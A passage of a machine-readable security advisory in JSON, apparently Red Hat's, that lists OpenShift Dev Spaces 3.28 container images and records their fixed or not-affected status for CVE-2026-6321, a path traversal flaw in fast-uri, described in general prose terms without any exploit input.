"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-6321",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-05-04T20:01:14.938426+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466582"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-uri. A remote attacker could exploit this vulnerability by providing a specially crafted Uniform Resource Locator (URL) containing percent-encoded path separators and dot segments. Due to incorrect processing, fast-uri would decode these elements before proper normalization, leading to distinct URLs resolving to the same internal path. This could allow an attacker to bypass security policies that rely on path-based comparisons, potentially gaining unauthorized access to resources.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-uri: fast-uri: Path traversal vulnerability allows bypass of security policies",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
